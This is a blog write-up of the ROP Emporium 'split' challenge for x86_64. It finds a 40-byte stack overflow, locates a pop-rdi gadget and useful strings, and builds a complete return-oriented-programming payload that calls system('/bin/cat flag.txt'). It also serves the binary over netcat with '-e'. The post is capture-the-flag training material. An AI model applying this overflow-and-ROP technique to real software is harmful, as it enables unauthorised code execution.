ropemporium: split and callme writeup

Jan 21, 2024 security rop

It sounds kinda weird when you say it like that..

This is going to be an analysis of the ROP Emporium split puzzle solution along with callme, for the x86_64 platform. I prefer to rely mostly on unix tools you’d find available on any box, simply because they’re the most re-usable for any other work you do. Presumably you have other reasons to be analyzing ELF binaries? Either way, it doesn’t matter, read on.

By the way this post will be a SPOILER so don’t read it unless you want that. Maybe give it a try first! Or don’t, none of my business.

intro

A quick introduction to the site: ROP Emporium provides a binary and a flag file, and your goal is to run the binary with an input such that it prints out the contents of the flag file. It’s obviously built like a program that’s not meant to do that, but the binary is structured in such a way that it contains the gadgets necessary to print out that file.

Each challenge requires you to analyze the binary and redirect execution by precisely manipulating the stack entries.

There are other hints provided, for example: you’re on a website called ROP Emporium and you already know the class of vulnerability you’re looking for. They also conveniently mention that 40 bytes of input are enough to reach the saved return address, so anything written after that ends up in the instruction pointer.

buffer overflow

Let’s say you didn’t know that though. Clear the kernel ring buffer:

sudo dmesg -C

and start feeding in strings of different lengths. Once you get to 40, the program crashes.

BOF=$(perl -E 'say "X" x 40')
echo "${BOF}" | ./split
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
[1]    6850 done                                        echo "${BOF}" |
       6851 illegal hardware instruction (core dumped)  ./split

dmesg now shows you

$ sudo dmesg -t
traps: split[6851] trap invalid opcode ip:40060f sp:7ffee0498f60 error:0 in split[400000+1000]

But if you add, for instance, five ‘A’s to the end, you’ll see that we’re starting to overwrite the instruction pointer:

echo "${BOF}AAAAA" | ./split
...
sudo dmesg -t
split[6875]: segfault at a4141414141 ip 00000a4141414141 sp 00007ffdff9f12a0 error 14 likely on CPU 1 (core 1, socket 0)
Code: Unable to access opcode bytes at 0xa4141414117.

See all those 41s? Verify on asciitable.com that 0x41 is “A”. The 0a in front of them is the newline that echo adds to the end of our input.
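If you’d rather not squint at an ASCII table, a few lines of Python can turn the faulting address from dmesg back into the bytes that produced it. This is only a sketch, and the helper name is made up for illustration:

```python
def address_to_input_bytes(address: int, width: int = 8) -> bytes:
    """Return the bytes of address as they sat in memory (lowest address first)."""
    return address.to_bytes(width, "little")


fault = 0x0A4141414141  # "segfault at a4141414141" from the dmesg line above
raw = address_to_input_bytes(fault)
print(raw)  # b'AAAAA\n\x00\x00'
```

The five A’s and the newline are ours; the two trailing zero bytes are what was left of the original return address.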

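Also verify that you get the exact same results if you encode the ascii characters yourself with the hexadecimal representation of that same string. This relies on an echo that expands \x escapes, as the zsh builtin does; in bash, use echo -e or printf instead: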

echo "${BOF}\x41\x41\x41\x41\x41" | ./split
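The trial-and-error length search from the start of this section can also be scripted. The following is a rough sketch, not part of the original workflow: the function name is hypothetical, and it assumes a POSIX system, where subprocess reports a process killed by a signal as a negative return code.

```python
import subprocess


def first_crashing_length(cmd, max_len=128, fill=b"X"):
    """Feed fill * n plus a newline on stdin for n = 1..max_len.

    Returns (n, signal_number) for the first run killed by a signal,
    or None if no run crashed.
    """
    for n in range(1, max_len + 1):
        proc = subprocess.run(
            cmd,
            input=fill * n + b"\n",  # echo appends a newline too
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        if proc.returncode < 0:  # negative return code: killed by a signal
            return n, -proc.returncode
    return None


# Example call, assuming the binary is in the current directory:
#   first_crashing_length(["./split"])
```

The signal number tells you what kind of crash it was (4 is SIGILL, 11 is SIGSEGV on Linux), which saves a trip to dmesg for the first pass.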

little endian

We know something more meaningful will have to go there, but before we figure out what that is, let’s explore how we would write it there if we did know it. Instead of all 41s, let’s put in 0x41 - 0x45 to see how it shows up in dmesg.

echo "${BOF}\x41\x42\x43\x44\x45" | ../split/split
sudo dmesg -t
split[7815]: segfault at a4544434241 ip 00000a4544434241 sp 00007ffc83aa4580 error 14 likely on CPU 4 (core 4, socket 0)
Code: Unable to access opcode bytes at 0xa4544434217.

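So our input was 41 42 43 44 45 and the CPU sees 45 44 43 42 41. The bytes sit in memory in the order we sent them, but x86_64 reads a multi-byte value starting from its least significant byte, so the first byte we sent becomes the lowest byte of the address. That’s little-endian byte order.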

Tip

Endianness is about which end of a number comes first when you read its bytes in order. In the representation "1024" we read "one thousand" first and "four" last, so the big end comes first: that’s big-endian. In little-endian, the small end comes first.
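To make that concrete, here is a small Python check that interprets the bytes we sent (plus the newline from echo) both ways. It is only an illustration of the byte order, using nothing beyond the values already shown above:

```python
sent = bytes([0x41, 0x42, 0x43, 0x44, 0x45, 0x0A])  # "ABCDE" plus echo's newline

as_little = int.from_bytes(sent, "little")  # first byte is the least significant
as_big = int.from_bytes(sent, "big")        # first byte is the most significant

print(hex(as_little))  # 0xa4544434241, the value dmesg reported
print(hex(as_big))     # 0x41424344450a
```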

Put a pin in that for now while we figure out what needs to go there.

analyzing the split binary

The first thing we can do is look for interesting function names. I like to use the nm tool to list symbols. If we grep for the symbols labeled with a ’t’, we get function names which reside in the “text” portion of the binary.

nm split | grep ' t'
00000000004005f0 t deregister_tm_clones
0000000000400660 t __do_global_dtors_aux
0000000000400690 t frame_dummy
00000000004006e8 t pwnme
0000000000400620 t register_tm_clones
0000000000400742 t usefulFunction

usefulFunction sounds useful.

You can also see that there’s a usefulString by searching the data section:

nm split | grep ' D'
0000000000601050 D __data_start
0000000000601058 D __dso_handle
0000000000601072 D _edata
0000000000601078 D __TMC_END__
0000000000601060 D usefulString
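If you end up doing this for several binaries, the nm output is easy to pick apart in a script. Below is a minimal sketch that parses lines in the three-column format shown above; the function name is made up, and the sample text is copied from the listings in this post:

```python
def parse_nm(output: str):
    """Yield (address, symbol_type, name) for each three-column line of nm output."""
    for line in output.splitlines():
        parts = line.split()
        if len(parts) == 3:  # lines without an address column are skipped
            address, symbol_type, name = parts
            yield int(address, 16), symbol_type, name


sample = """\
00000000004006e8 t pwnme
0000000000400742 t usefulFunction
0000000000601060 D usefulString
"""

useful = {
    name: hex(address)
    for address, _, name in parse_nm(sample)
    if name.startswith("useful")
}
print(useful)  # {'usefulFunction': '0x400742', 'usefulString': '0x601060'}
```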

What’s happening within usefulFunction? We can use gdb to figure that out. Use the disass command to disassemble the function we’re curious about:

gdb -q split
(No debugging symbols found in split)
(gdb) disass usefulFunction
Dump of assembler code for function usefulFunction:
   0x0000000000400742 <+0>:	push   rbp
   0x0000000000400743 <+1>:	mov    rbp,rsp
   0x0000000000400746 <+4>:	mov    edi,0x40084a
   0x000000000040074b <+9>:	call   0x400560 <system@plt>
   0x0000000000400750 <+14>:	nop
   0x0000000000400751 <+15>:	pop    rbp
   0x0000000000400752 <+16>:	ret
End of assembler dump.

Or get the same info with objdump:

objdump -D split
[SNIP]
0000000000400742 <usefulFunction>:
  400742:	55                   	push   %rbp
  400743:	48 89 e5             	mov    %rsp,%rbp
  400746:	bf 4a 08 40 00       	mov    $0x40084a,%edi
  40074b:	e8 10 fe ff ff       	call   400560 <system@plt>
  400750:	90                   	nop
  400751:	5d                   	pop    %rbp
  400752:	c3                   	ret
  400753:	66 2e 0f 1f 84 00 00 	cs nopw 0x0(%rax,%rax,1)
  40075a:	00 00 00
  40075d:	0f 1f 00             	nopl   (%rax)
[/SNIP]

So system is being called with something, and the call is landing in the PLT (procedure linkage table). This is a lookup table the ELF format uses to enable lazy binding of external calls, and since we know the virtual address of the stub that ends up there we don’t need to go too deep in understanding exactly how it works.
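You can confirm where that call lands from the raw bytes in the objdump listing. A near call on x86_64 is the opcode e8 followed by a signed 32-bit little-endian displacement, measured from the address of the next instruction. The sketch below decodes the bytes at 0x40074b; the helper name is hypothetical:

```python
import struct


def call_target(instruction_address: int, encoded: bytes) -> int:
    """Decode a 5-byte near call (opcode e8 + signed 32-bit displacement)."""
    if len(encoded) != 5 or encoded[0] != 0xE8:
        raise ValueError("not a 5-byte e8 call")
    (displacement,) = struct.unpack("<i", encoded[1:])
    # The displacement is relative to the address of the *next* instruction.
    return instruction_address + len(encoded) + displacement


target = call_target(0x40074B, bytes.fromhex("e810feffff"))
print(hex(target))  # 0x400560
```

That matches the system@plt address that both gdb and objdump print next to the call.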

What’s it being called with? On x86_64, the first argument to a function is passed in the rdi register. The disassembly writes to edi, which is the lower 32 bits of rdi; writing to edi zeroes the upper 32 bits, so for an address this small the effect is the same. gdb can also tell us what’s being loaded into that register in the line right above the call to system, using the x/s or “examine as string” command:

(gdb) x/s 0x40084a
0x40084a:	"/bin/ls"

Okay! So usefulFunction is calling system("/bin/ls"). What we need to do is execute this line but with a different string in the rdi register. Maybe one that prints the flag.txt file?

Remember we already saw a usefulString in the data section, what’s in that? gdb can tell us that too in the same way.

(gdb) x/s 0x601060
0x601060 <usefulString>:	"/bin/cat flag.txt"

Perfect!

ROP chain

So the goal is to make the call to system with the address of usefulString in the rdi register instead of what the program loads there. This is the perfect target for a ROP gadget.

If we could find a gadget which pops the next stack value into %rdi and returns,

pop rdi
ret

then we could write the address of that gadget onto the stack (overwriting the saved return address), and put the address of /bin/cat flag.txt right after it, so it ends up in rdi. And then right after that, we’d put the address of the call to system, so that the gadget’s ret would go there and execute system("/bin/cat flag.txt").
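It can help to walk through that sequence on a toy stack before touching the real one. The following Python sketch is a simulation only, not an exploit: it models the stack as a list and replays what ret, pop rdi and ret would do. The three addresses are the ones that appear elsewhere in this post.

```python
POP_RDI_RET = 0x4007C3    # address of the pop rdi; ret gadget
USEFUL_STRING = 0x601060  # address of "/bin/cat flag.txt"
CALL_SYSTEM = 0x40074B    # the call system@plt instruction in usefulFunction


def run_chain(stack):
    """Replay ret / pop rdi / ret on a toy stack (index 0 is the top)."""
    stack = list(stack)
    registers = {}
    rip = stack.pop(0)               # the function's ret pops the overwritten return address
    if rip != POP_RDI_RET:
        raise ValueError("first entry must be the gadget address")
    registers["rdi"] = stack.pop(0)  # pop rdi
    rip = stack.pop(0)               # the gadget's own ret
    return rip, registers


rip, registers = run_chain([POP_RDI_RET, USEFUL_STRING, CALL_SYSTEM])
print(hex(rip), hex(registers["rdi"]))  # 0x40074b 0x601060
```

Execution ends up at the call instruction with rdi pointing at the string, which is the state we want.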

finding ROP gadgets

Here I must admit, I’m a bit of a fraud. Having already extolled the virtue and purity of using only builtin unix tools for our analysis, there are simply better toolsets when it comes to analyzing a binary for ROP gadgets.

So I wussed out and used Ropper which is a Python framework for disassembly and binary analysis. If anyone has better ideas please email me. Nevertheless, the mighty Snake provides:

ropper --file split | grep rdi
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
0x00000000004006d4: add byte ptr [rax], al; add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004006d6: add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004007c3: pop rdi; ret;

This last entry is exactly what we said we needed.
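For a gadget this small, a plain byte search is a low-tech alternative to a full gadget finder: pop rdi is the single byte 5f and ret is c3. The sketch below is an assumption-laden illustration, not a Ropper replacement. The function name is made up, it searches every byte it is given (not only executable sections), and turning a file offset into an address by adding a base only works if the file is mapped that way, as the 400000 in the dmesg line suggests for this binary.

```python
def find_bytes(data: bytes, pattern: bytes, base: int = 0):
    """Return base + offset for every occurrence of pattern in data."""
    hits = []
    start = data.find(pattern)
    while start != -1:
        hits.append(base + start)
        start = data.find(pattern, start + 1)
    return hits


POP_RDI_RET = bytes([0x5F, 0xC3])  # pop rdi; ret

# Synthetic demo: "pop r15; ret" encodes as 41 5f c3, so starting one byte
# into it leaves a "pop rdi; ret".
demo = bytes.fromhex("90" "415fc3" "90")
print([hex(a) for a in find_bytes(demo, POP_RDI_RET, base=0x1000)])  # ['0x1002']

# Against the real file (assumed mapping, see above):
#   find_bytes(open("split", "rb").read(), POP_RDI_RET, base=0x400000)
```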

the plan

So we have a buffer overflow in pwnme, and our ROP chain will need to:

Overwrite the return address with the address of the ROP gadget.
The ROP gadget will take whatever’s next on the stack and place it in rdi, and then
the ROP gadget will return to the next address on the stack, which needs to be the call to system.

The address we use for that is 0x40074b, the call system@plt instruction inside usefulFunction that we found in the disassembly earlier.

payload

The payload will be <overflow string> + <gadget address> + <useful string address> + <system@plt call>

Each entry on the stack is 8 bytes wide on x86_64, so 0x004007c3 is really 0x00000000004007c3. When you write the addresses into the payload in little-endian order, the padding zeros come at the end.

Look up the ascii characters, if they are printable, at https://asciitable.com. Some of them are. I like to set up a table to do all parts of the 64-bit address construction.

Structure	Address	Reversed bytes	Payload bytes
rop gadget	0x004007c3	c3 07 40	\xc3\x07@\x00\x00\x00\x00\x00
cat flag string	0x00601060	60 10 60	`\x10`\x00\x00\x00\x00\x00
system@plt call	0x0040074b	4b 07 40	K\x07@\x00\x00\x00\x00\x00

Now our final payload will be:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00
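Building the string by hand is a good exercise, but it is also easy to mistype. Here is a short Python sketch that assembles the same bytes with struct.pack, where "<Q" means an unsigned 64-bit value in little-endian order. The function names are my own, and the addresses are the three from the table:

```python
import struct

CHAIN = [
    0x4007C3,  # pop rdi; ret
    0x601060,  # usefulString, "/bin/cat flag.txt"
    0x40074B,  # call system@plt inside usefulFunction
]


def build_payload(offset: int = 40) -> bytes:
    """Padding up to the return address, then each address as 8 little-endian bytes."""
    return b"A" * offset + b"".join(struct.pack("<Q", a) for a in CHAIN)


def write_payload(stream) -> None:
    """Write the raw payload plus a trailing newline to a binary stream."""
    stream.write(build_payload() + b"\n")


payload = build_payload()
print(len(payload))   # 64
print(payload[40:48])  # b'\xc3\x07@\x00\x00\x00\x00\x00'
```

To feed it to the binary, one option is to save this as a script that ends with write_payload(sys.stdout.buffer) (after an import sys) and pipe its output into ./split, which sidesteps any differences in how your shell’s echo handles \x escapes.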

Let’s run it:

echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | ./split
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!

Exiting
[1]    33579 done                              echo  |
       33580 segmentation fault (core dumped)  ./split

We can also run our split executable over a connection! (The -e flag needs a netcat that supports it, such as traditional netcat or ncat.)

nc -lvp 9999 -e ./split

and in another terminal

echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | nc localhost 9999
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...